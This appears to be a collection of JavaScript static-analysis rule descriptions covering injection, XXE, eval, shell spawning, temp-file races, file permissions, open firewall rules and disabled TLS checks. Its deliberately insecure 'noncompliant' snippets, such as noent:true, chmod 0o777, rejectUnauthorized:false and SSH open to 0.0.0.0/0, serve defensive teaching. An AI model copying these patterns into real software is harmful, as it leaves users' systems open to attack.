const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT name FROM users WHERE id = $1', [userinput], (err, res) => {});

Exceptions

This rule’s current implementation does not follow variables. It will only detect SQL queries which are formatted directly in the function call.

const sql = 'SELECT * FROM users WHERE id = ' + userinput;
mycon.query(sql, (err, res) => {}); // Sensitive but no issue is raised.

See

javascript:S4817

This rule is deprecated, and will eventually be removed.

Executing XPath expressions is security-sensitive and has led to vulnerabilities in the past.

User-provided data, such as URL parameters, should always be considered untrusted and tainted. Constructing XPath expressions directly from tainted data enables attackers to inject specially crafted values that change the meaning of the expression itself. Successful XPath injection attacks can read sensitive information from the XML document.

Ask Yourself Whether

  • the XPath expression might contain unsafe input coming from a user.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize any user input before using it in an XPath expression.
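
A minimal validation sketch, assuming the user input is expected to be a single XML element name (the allowlist pattern and function name are illustrative; the right constraint depends on the application):

```javascript
// Reject anything that is not a plain XML element name. Quotes, brackets
// and slashes are exactly what an attacker needs to alter the expression.
function safeXPathStep(userinput) {
  if (!/^[A-Za-z_][A-Za-z0-9_.-]*$/.test(userinput)) {
    throw new Error('Invalid XPath step: ' + userinput);
  }
  return userinput;
}

console.log(safeXPathStep('user')); // accepted unchanged

try {
  safeXPathStep("user' or '1'='1"); // classic injection payload
} catch (e) {
  console.log('rejected');
}
```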

Sensitive Code Example

// === Server side ===

var xpath = require('xpath');
var xmldom = require('xmldom');

var doc = new xmldom.DOMParser().parseFromString(xml);
var nodes = xpath.select(userinput, doc); // Sensitive
var node = xpath.select1(userinput, doc); // Sensitive

// === Client side ===

// Chrome, Firefox, Edge, Opera, and Safari use the evaluate() method to select nodes:
var nodes = document.evaluate(userinput, xmlDoc, null, XPathResult.ANY_TYPE, null); // Sensitive

// Internet Explorer uses its own methods to select nodes:
var nodes = xmlDoc.selectNodes(userinput); // Sensitive
var node = xmlDoc.SelectSingleNode(userinput); // Sensitive

See

javascript:S4818

This rule is deprecated, and will eventually be removed.

Using sockets is security-sensitive and has led to vulnerabilities in the past.

Sockets are vulnerable in multiple ways:

  • They enable software to interact with the outside world. Because that world is full of attackers, it is necessary to check that they cannot receive sensitive information or inject dangerous input.
  • The number of sockets is limited and can be exhausted, which makes the application unresponsive to users who need additional sockets.

This rule flags code that creates sockets. It matches only direct use of sockets, not use through frameworks or high-level APIs such as HTTP connections.

Ask Yourself Whether

  • sockets are created without any limit every time a user performs an action.
  • input received from sockets is used without being sanitized.
  • sensitive data is sent via sockets without being encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In many cases there is no need to open a socket yourself. Use libraries and existing protocols instead.
  • Encrypt all sensitive data before sending it. It is usually better to encrypt data even if it is not sensitive yet, as that might change later.
  • Sanitize any input read from the socket.
  • Limit the number of sockets a given user can create. Close the sockets as soon as possible.

Sensitive Code Example

const net = require('net');

var socket = new net.Socket(); // Sensitive
socket.connect(80, 'google.com');

// net.createConnection creates a new net.Socket, initiates connection with socket.connect(), then returns the net.Socket that starts the connection
net.createConnection({ port: port }, () => {}); // Sensitive

// net.connect is an alias to net.createConnection
net.connect({ port: port }, () => {}); // Sensitive

See

javascript:S6319

Amazon SageMaker is a managed machine learning service in a hosted, production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information, that should not be stored unencrypted. With encryption enabled, adversaries who gain physical access to the storage media cannot read the data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance:

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';

new CfnNotebookInstance(this, 'example', {
      instanceType: 'instanceType',
      roleArn: 'roleArn'
}); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sagemaker.CfnNotebookInstance:

import { CfnNotebookInstance } from 'aws-cdk-lib/aws-sagemaker';
import { Key } from 'aws-cdk-lib/aws-kms';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});
new CfnNotebookInstance(this, 'example', {
    instanceType: 'instanceType',
    roleArn: 'roleArn',
    kmsKeyId: encryptionKey.keyId
});

See

javascript:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in libxmljs

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml, {
    noblanks: true,
    noent: true, // Noncompliant
    nocdata: true
});

Compliant solution

parseXmlString is safe by default.

var libxmljs = require('libxmljs');
var fs = require('fs');

var xml = fs.readFileSync('xxe.xml', 'utf8');
libxmljs.parseXmlString(xml);

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

javascript:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, this has led to real-world vulnerabilities.

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see the list below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such APIs make sure that:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

const fs = require('fs');

let tmp_file = "/tmp/temporary_file"; // Sensitive
fs.readFile(tmp_file, 'utf8', function (err, data) {
  // ...
});

const fs = require('fs');

let tmp_dir = process.env.TMPDIR; // Sensitive
fs.readFile(tmp_dir + "/temporary_file", 'utf8', function (err, data) {
  // ...
});

Compliant Solution

const tmp = require('tmp');

const tmpobj = tmp.fileSync(); // Compliant

See

javascript:S1525

This rule is deprecated; use S4507 instead.

Why is this an issue?

The debugger statement can be placed anywhere in procedures to suspend execution. Using the debugger statement is similar to setting a breakpoint in the code. Such statements must absolutely be removed from source code shipped to production, to prevent unexpected behavior or added vulnerability to attacks.

Noncompliant code example

for (i = 1; i<5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
  // Wait for user to resume.
  debugger;
}

Compliant solution

for (i = 1; i<5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
}

Resources

javascript:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o777); // Sensitive

const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o777); // Sensitive

const fs = require('fs');
const fsPromises = fs.promises;

async function fileHandler() {
  let filehandle;
  try {
    filehandle = await fsPromises.open('/tmp/fsPromises', 'r');
    await filehandle.chmod(0o777); // Sensitive
  } finally {
    if (filehandle !== undefined)
      await filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o000); // Sensitive

Compliant Solution

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o770); // Compliant

const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o770); // Compliant

const fs = require('fs');
const fsPromises = fs.promises;

async function fileHandler() {
  let filehandle;
  try {
    filehandle = await fsPromises.open('/tmp/fsPromises', 'r');
    await filehandle.chmod(0o770); // Compliant
  } finally {
    if (filehandle !== undefined)
      await filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o007); // Compliant

See

javascript:S1523

Executing code dynamically is security-sensitive and has led to vulnerabilities in the past.

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use cases. However, most of the time their use is frowned upon because they also increase the risk of injected code. Such attacks can run either on the server or in the client (for example, an XSS attack) and have a huge impact on an application’s security.

This rule raises issues on calls to eval and the Function constructor. This rule does not detect code injections; it only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

The rule also flags string literals starting with javascript:, as code passed in javascript: URLs is evaluated the same way as calls to eval or the Function constructor.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (for example: Security Managers in Java, iframes and the same-origin policy for JavaScript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.
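
For the common case of reading a property whose name is only known at runtime, no dynamic code API is needed at all; bracket notation selects the property without evaluating anything (obj and propName below are illustrative):

```javascript
// Instead of eval('obj.' + propName), index the object directly:
// the input can select a property but can never execute code.
const obj = { name: 'Ada', role: 'admin' };
const propName = 'name'; // imagine this value comes from user input

const value = Object.prototype.hasOwnProperty.call(obj, propName)
  ? obj[propName]
  : undefined; // unknown keys resolve to undefined instead of probing the prototype
```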

Sensitive Code Example

let value = eval('obj.' + propName); // Sensitive
let func = Function('obj' + propName); // Sensitive
location.href = 'javascript:void(0)'; // Sensitive

Exceptions

This rule will not raise an issue when the argument of eval or Function is a literal string, as this is reasonably safe.

See

javascript:S4721

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process: shell metacharacters can then be used (when parameters are user-controlled, for instance) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

const cp = require('child_process');

// A shell will be spawned in the following cases:
cp.exec(cmd); // Sensitive
cp.execSync(cmd); // Sensitive

cp.spawn(cmd, { shell: true }); // Sensitive
cp.spawnSync(cmd, { shell: true }); // Sensitive
cp.execFile(cmd, { shell: true }); // Sensitive
cp.execFileSync(cmd, { shell: true }); // Sensitive

Compliant Solution

const cp = require('child_process');

cp.spawnSync("/usr/bin/file.exe", { shell: false }); // Compliant

See

javascript:S5148

A newly opened window that retains access to the originating window can enable basic phishing attacks (the window.opener object is not null, so the opened page can set window.opener.location to a malicious website).

For instance, an attacker can put a link (say: "http://example.com/mylink") on a popular website that changes, when opened, the original page to "http://example.com/fake_login". On "http://example.com/fake_login" there is a fake login page which could trick real users to enter their credentials.

Ask Yourself Whether

  • The application opens untrusted external URLs.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use noopener to prevent untrusted pages from abusing window.opener.

Note: In Chrome 88+, Firefox 79+ and Safari 12.1+, target=_blank on anchors implies rel=noopener, which enables the protection by default.

Sensitive Code Example

window.open("https://example.com/dangerous");

Compliant Solution

window.open("https://example.com/dangerous", "WindowName", "noopener");

See

javascript:S1313

Hardcoding IP addresses is security-sensitive and has led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It encourages mistakenly using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but with a hardcoded IP address, fixing the issue takes more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

ip = "192.168.12.42"; // Sensitive

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Compliant Solution

ip = process.env.IP_ADDRESS; // Compliant

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID).
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the 2001:db8::/32 range, reserved for documentation purposes by RFC 3849
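As an illustration (not part of the rule), a check covering several of the exception ranges above might be sketched as follows; the function name is hypothetical:

```javascript
// Sketch of a check for some of the address ranges listed above that the
// rule treats as non-sensitive (function name is illustrative).
function isNonSensitiveIp(ip) {
  return (
    /^127\./.test(ip) ||           // loopback 127.0.0.0/8
    ip === '255.255.255.255' ||    // broadcast
    ip === '0.0.0.0' ||            // non-routable
    /^2\.5\.\d+\.\d+$/.test(ip) || // likely an OID, not an IP
    /^192\.0\.2\./.test(ip) ||     // RFC 5737 documentation ranges
    /^198\.51\.100\./.test(ip) ||
    /^203\.0\.113\./.test(ip)
  );
}

console.log(isNonSensitiveIp('127.0.0.1'));     // true
console.log(isNonSensitiveIp('192.168.12.42')); // false
```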

See

javascript:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allow publisher systems to fan out messages to a large number of subscriber systems. Amazon SNS can encrypt messages as soon as they are received. If adversaries gain physical access to the storage medium or otherwise leak a message, they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

new Topic(this, 'exampleTopic'); // Sensitive

For aws_cdk.aws_sns.CfnTopic

import { Topic, CfnTopic } from 'aws-cdk-lib/aws-sns';

new CfnTopic(this, 'exampleCfnTopic'); // Sensitive

Compliant Solution

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

new Topic(this, 'exampleTopic', {
    masterKey: encryptionKey
});

For aws_cdk.aws_sns.CfnTopic

import { CfnTopic } from 'aws-cdk-lib/aws-sns';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

cfnTopic = new CfnTopic(this, 'exampleCfnTopic', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

javascript:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Public access may be allowed for various reasons, such as quick maintenance or time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(this, "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PUBLIC} // Sensitive
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: true, // Sensitive
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PUBLIC}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: true, // Sensitive
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const rdsSubnetGroupPublic = new rds.CfnDBSubnetGroup(this, "publicSubnet", {
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "publicSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PUBLIC
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPublic.ref,
    publiclyAccessible: true, // Sensitive
    vpcSecurityGroups: [sg.securityGroupId]
})

Compliant Solution

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(
    this,
    "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: false,
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: false,
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const rdsSubnetGroupPrivate = new rds.CfnDBSubnetGroup(this, "example",{
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "privateSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPrivate.ref,
    publiclyAccessible: false,
    vpcSecurityGroups: [sg.securityGroupId]
})

See

javascript:S4829

This rule is deprecated, and will eventually be removed.

Reading standard input is security-sensitive. It has led to vulnerabilities in the past.

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.
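A minimal sketch of such validation, assuming an allow-list of expected characters (the accepted format and function name are illustrative):

```javascript
// Accept only input matching an expected format; reject everything else
// before the data is used anywhere.
function sanitizeStdinLine(line) {
  const trimmed = line.trim();
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(trimmed)) {
    throw new Error('Unexpected input format');
  }
  return trimmed;
}
```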

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
// All uses of process.stdin are security-sensitive and should be reviewed

process.stdin.on('readable', () => {
	const chunk = process.stdin.read(); // Sensitive
	if (chunk !== null) {
		dosomething(chunk);
	}
});

const readline = require('readline');
readline.createInterface({
	input: process.stdin // Sensitive
}).on('line', (input) => {
	dosomething(input);
});

See

javascript:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led to vulnerabilities in the past.

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus, passing sensitive information via command line arguments should be considered insecure.

This rule raises an issue on every program entry point (main method) where command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing it on the command line. It is common to write it to the process's standard input, or to pass the path to a file containing the information.

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
var param = process.argv[2]; // Sensitive: check how the argument is used
console.log('Param: ' + param);

See

javascript:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from all IPv4"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup.addIngressRule(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcpRange(1, 1024)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "0.0.0.0/0", // Noncompliant
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroupIngress( // Noncompliant
    this,
    "ingress-all-ip-tcp-ssh", {
        ipProtocol: "tcp",
        cidrIp: "0.0.0.0/0",
        fromPort: 22,
        toPort: 22,
        groupId: securityGroup.attrGroupId
})

Compliant solution

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.ipv4("192.0.2.0/24"),
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from a trusted range"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup3 = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup3.addIngressRule(
    ec2.Peer.anyIpv4(),
    ec2.Port.tcpRange(1024, 1048)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "192.0.2.0/24",
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

new ec2.CfnSecurityGroupIngress(
    this,
    "ingress-all-ipv4-tcp-http", {
        ipProtocol: "6",
        cidrIp: "0.0.0.0/0",
        fromPort: 80,
        toPort: 80,
        groupId: securityGroup.attrGroupId
    }
)

Resources

Documentation

Standards

javascript:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Node.js

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation gets disabled by setting rejectUnauthorized to false. To enable validation, set the value to true, or do not set rejectUnauthorized at all to keep the secure default.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  rejectUnauthorized: false,
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
}); // Noncompliant

